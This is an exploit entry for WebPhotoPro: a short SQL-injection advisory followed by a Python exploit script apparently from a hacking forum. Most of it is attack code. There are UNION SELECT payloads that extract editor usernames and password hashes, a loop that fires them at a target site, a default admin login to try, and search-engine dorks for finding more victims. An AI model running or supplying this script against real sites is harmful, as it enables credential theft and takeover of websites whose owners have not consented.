WebPhotoPro - Multiple SQL Injections

source: https://www.securityfocus.com/bid/32829/info

WebPhotoPro is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

#!/usr/bin/python
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# !!! Special thanx for d3hydr8 and rsauron who inspired me !!! 
#
################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# ---  d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu # 
# ---  QKrun1x  - skillfaker - Croathack - Optyx - Nuclear     #
# ---  Eliminator and to all members of darkc0de and ljuska.org#                                                             #
################################################################ 


import sys, os, re, time, urllib2

if sys.platform == 'linux' or sys.platform == 'linux2':
	clearing = 'clear'
else:
	clearing = 'cls'
os.system(clearing)

if len(sys.argv) !=2:
	print "\n|---------------------------------------------------------------|"
        print "| b4ltazar[@]gmail[dot]com                                      |"
        print "|   12/2008      WebPhotoPro exploit                            |"
	print "| Help: webphotopro.py -h                                       |"
	print "| Visit www.darkc0de.com and www.ljuska.org                     |"
        print "|---------------------------------------------------------------|\n"
	sys.exit(1)
for arg in sys.argv:
	if arg == '-h' or arg == '--help' or arg == '-help':
		print "\n|---------------------------------------------------------------|"
                print "| b4ltazar[@]gmail[dot]com                                      |"
                print "|   12/2008      WebPhotoPro exploit                            |"
                print "| Usage: webphotopro.py www.site.com                            |"
	        print "| Example: python webphotopro.py  www.ere.gov.al                |"
	        print "| Visit www.darkc0de.com and www.ljuska.org                     |"
                print "|---------------------------------------------------------------|\n"
		sys.exit(1)	
vulnsql = ["art.php?idm=1'+and+1=2+union+all+select+1,2,3,4,5,6,concat_ws(char(58),username,password),8,9,10,11,12,13+from+editor/*", "rub.php?idr=1+and+1=2+union+all+select+1,2,3,4,5,6,concat_ws(char(58),username,password),8,9,10,11,12+from+editor--","rub.php?idr=1+and+1=2+union+all+select+1,2,3,concat_ws(char(58),username,password),5,6,7,8,9+from+editor--", "rub.php?idr=1+and+1=2+union+all+select+1,2,3,concat_ws(char(58),username,password),5,6,7,8,9,10+from+editor--","galeri_info.php?ida=1+and+1=2+union+all+select+1,2,3,concat_ws(char(58),username,password),5,6+from+editor/*", "galeri_info.php?ida=1+and+1=2+union+all+select+1,concat_ws(char(58),username,password),3,4,5,6,7+from+editor/*","rubrika.php?idr=1+and+1=2+union+all+select+1,concat_ws(char(58),username,password),3,4,5,6,7+from+editor--","rub.php?idr=176+and+1=2+union+all+select+1,2,3,4,5,6,concat_ws(char(58),username,password),8,9,10,11,12+from+editor/*"]

site = sys.argv[1]
if site[:4] != "http":
	site = "http://"+site
if site[-1] != "/":
	site = site + "/"
 
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com                                      |"
print "|   12/2008      WebPhotoPro exploit                            |"
print "| Visit www.darkc0de.com and www.ljuska.org                     |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s" % time.strftime("%X")
print "\n[+] Target:",site
print "[+]",len(vulnsql),"Vulns loaded..."
print "[+] Starting Scan...\n"

for sql in vulnsql:
	
	print "[+] Checking:" ,site+sql.replace("\n","")
	print
	try:
		code = urllib2.urlopen(site+sql.replace("\n", "")).read()
		hash = re.findall("[a-f0-9]"*32,code)
		if len(hash) >=1:
			print "[w00t!w00t!]" ,site+sql.replace("\n","")
			print
			print "Admin panel: ",site+"admini/"
			print "Check for default login --> admin:demo"
			print
			
	except(urllib2.HTTPError):
			pass
	except(KeyboardInterrupt):
			pass
print
print	
print 	
print "[!!!] For more target try next dorks: "
print
print '''\t    inurl:/art.php?idm=
            intext:"Powered by WebPhotoPro"
	    inurl:/rub.php?idr=
	    inurl:/galeri_info.php?lang=
	    inurl:/galeri_info.php?l=
	    inurl:/galeri_info.php?ida=
	    inurl:/tekst.php?idt=
	    inurl:/rubrika.php?idr=
	    intext:"Powered by WebPhotoPro"  site:al'''
print
print "Check for more details:  http://packetstormsecurity.org/0808-exploits/webphotopro-sql.txt"   
print 
print "\n[-] %s" % time.strftime("%X")